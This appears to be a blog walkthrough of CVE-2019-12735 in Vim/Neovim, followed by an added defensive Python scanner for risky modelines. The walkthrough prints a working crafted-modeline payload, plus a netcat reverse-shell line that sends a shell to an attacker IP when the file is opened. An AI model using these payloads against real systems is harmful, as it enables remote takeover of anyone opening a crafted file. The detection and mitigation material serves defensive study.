Exploit PoC: Linux command execution on Vim/Neovim vulnerability (CVE-2019-12735)

Magrabur Sofily
Jun 11 · 3 min read

Category: Remote Code Execution
Severity: High
Description:
The flaw lies in how Vim and Neovim on Linux handle "modelines", a feature enabled by default that automatically finds and applies a set of editor options placed by the file's creator in the first and last lines of a document. As a result, simply opening an innocent-looking, specially crafted file in Vim or Neovim can let an attacker execute commands on the Linux system and ultimately take over the target.

Affected Products:
• Vim before version 8.1.1365
• Neovim before version 0.3.6

Here is a step-by-step PoC of exploiting the vulnerability:

PoC Machine: I used my Kali Linux (4.17.8 x86_64) as the target machine for this purpose.
Victim machine IP: 172.31.242.25
Attacking machine IP: 172.31.242.143
PoC Summary:
1. Checked that the modeline option has not been disabled.
2. Quick PoC for command execution in the Vim editor.
3. Running a shell command that creates a reverse shell to take over the target system.

Step-1: My Kali Linux kernel details:
root@kali:~# cat /proc/version
Linux version 4.17.0-kali1-amd64 (devel@kali.org) (gcc version 7.3.0 (Debian 7.3.0-25)) #1 SMP Debian 4.17.8-1kali1 (2018-07-24)
root@kali:~#

[Screenshot: Victim Kali machine details]

Step-2: Enable modelines in the vimrc file. Just add ':set modeline' at the end of the file and save.
root@kali:~# tail -2 /etc/vim/vimrc

:set modeline
root@kali:~#

[Screenshot: vimrc file]

Step-3: Create a file cmdtest.txt containing the command-execution modeline.
root@kali:~# cat cmdtest.txt
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
root@kali:~#

[Screenshot: command execution file]

Step-4: Now open the above file with the vim editor. If the output of 'uname -a' is printed, the editor is vulnerable.
root@kali:~# vim cmdtest.txt
Linux kali 4.17.0-kali1-amd64 #1 SMP Debian 4.17.8-1kali1 (2018-07-24) x86_64 GNU/Linux
Press ENTER or type command to continue

[Screenshot: Successful command execution]

Press Enter; this takes you into the Vim editor. Use ':q!' to exit.

Step-5: Now comes the real fun part: creating a reverse shell.
Create a new file (or edit cmdtest.txt) so that the modeline runs a netcat reverse-shell command instead of the simple uname command.

Step-5.1: At the attacker side:
Set up a netcat listener on the attacking machine.

[Screenshot: Attacking machine setup]

Step-5.2: At the victim side: prepare and run the exploit
I am creating a new file named 'revshell.txt' in which I replaced the previous 'uname -a' command with a simple netcat reverse shell command.

root@kali:~# cat revshell.txt
:!nc -nv 172.31.242.143 4444 -e /bin/sh ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
root@kali:~#

[Screenshot: Run the exploit]

Step-5.3: Finally, open the revshell.txt file with the vim command and watch the attacker machine for the reverse shell.

Victim side:
root@kali:~# vim revshell.txt
(UNKNOWN) [172.31.242.143] 4444 (?) open

[Screenshot: Reverse shell created]

Attacker side:

[Screenshot: Successfully owned victim machine]
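From the defender's side, the two things worth checking are the ones Steps 2 through 4 rely on: whether a vimrc leaves 'modeline' on, and whether a file carries a modeline that sets expression-evaluating options such as fde (foldexpr) and fdt (foldtext), which is the vector the crafted cmdtest.txt and revshell.txt lines use. The following Python checker is an added example written for this page, not code from the original post or from the Vim/Neovim projects. It assumes the common vi:/vim:/ex: modeline spellings (Vim's versioned vim< / vim= / vim> forms are not handled), it mirrors Vim's behaviour of scanning only the first and last five lines, and it reflects Vim's documented default of 'modeline' being on for ordinary users and off for root (which is why the post had to add ':set modeline' to /etc/vim/vimrc). The sample inputs are constructed copies of the modeline shown in the post and of a harmless indentation modeline.

```python
"""Defensive checks for the Vim/Neovim modeline issue (CVE-2019-12735).

Added example, not from the original post. Two helpers:
  * modeline_enabled(vimrc_text)  - does a vimrc leave 'modeline' on?
  * find_risky_modelines(text)    - flag modelines that set options whose
                                    values Vim evaluates as expressions.
"""
import re

# Vim only scans the first and last 'modelines' lines of a file (default 5).
MODELINES_WINDOW = 5

# Real Vim option names (short and long) whose values are evaluated as Vim
# script expressions; the PoC on this page abuses fde and fdt.
EXPR_OPTIONS = {
    "fde", "foldexpr", "fdt", "foldtext", "inex", "includeexpr",
    "inde", "indentexpr", "fex", "formatexpr",
}

# Start of a modeline: whitespace (or line start), then vi:/vim:/ex:.
# Assumption: versioned forms such as "vim<800:" are not covered.
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|Vi|VIM|ex):\s*(?P<body>.*)$")

# Option names inside a modeline body; options are separated by ':' or
# whitespace, so text inside a quoted expression value is not matched.
OPTION_RE = re.compile(r"(?:^|[:\s])(?:no)?(?P<name>[A-Za-z]+)(?=[=:\s]|$)")

# A vimrc 'set' line; Vim ignores a leading ':' in rc files.
SET_RE = re.compile(r"^:?\s*(?:set|se|setlocal|setl)\s+(?P<opts>.+)$")

# Constructed copies of the post's crafted line and of a benign modeline.
CRAFTED = r':!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="'
BENIGN = "# vim: set ts=4 sw=4 et:"


def modeline_enabled(vimrc_text, default=True):
    """Return True if 'modeline' is on after applying vimrc_text.

    Vim's own default is on for ordinary users and off for root, so pass
    default=False when checking root's environment. As in Vim, the last
    'set modeline' / 'set nomodeline' (or ml / noml) wins.
    """
    state = default
    for raw in vimrc_text.splitlines():
        line = raw.strip()
        if not line or line.startswith('"'):  # blank line or comment
            continue
        m = SET_RE.match(line)
        if not m:
            continue
        for opt in m.group("opts").split():
            if opt in ("modeline", "ml"):
                state = True
            elif opt in ("nomodeline", "noml"):
                state = False
    return state


def find_risky_modelines(text, window=MODELINES_WINDOW):
    """Return [(line_number, option_name), ...] for modelines in the lines
    Vim would actually scan that set an expression-evaluating option."""
    lines = text.splitlines()
    n = len(lines)
    # Only the first and last `window` lines are examined, like Vim does.
    candidates = set(range(min(window, n))) | set(range(max(0, n - window), n))
    findings = []
    for i in sorted(candidates):
        m = MODELINE_RE.search(lines[i])
        if not m:
            continue
        for opt in OPTION_RE.finditer(m.group("body")):
            name = opt.group("name")
            if name in EXPR_OPTIONS:
                findings.append((i + 1, name))
    return findings


if __name__ == "__main__":
    print("root vimrc with ':set modeline' ->",
          modeline_enabled("\n:set modeline\n", default=False))
    print("crafted line ->", find_risky_modelines(CRAFTED))
    print("benign line  ->", find_risky_modelines(BENIGN))
```

Run against the post's cmdtest.txt, find_risky_modelines reports the fde and fdt options on line 1; the benign indentation modeline reports nothing, and the same crafted line buried in the middle of a longer file is ignored because Vim would not read it there. The matching mitigation is the opposite of Step-2: 'set nomodeline' in vimrc, plus upgrading to Vim 8.1.1365 / Neovim 0.3.6 or later.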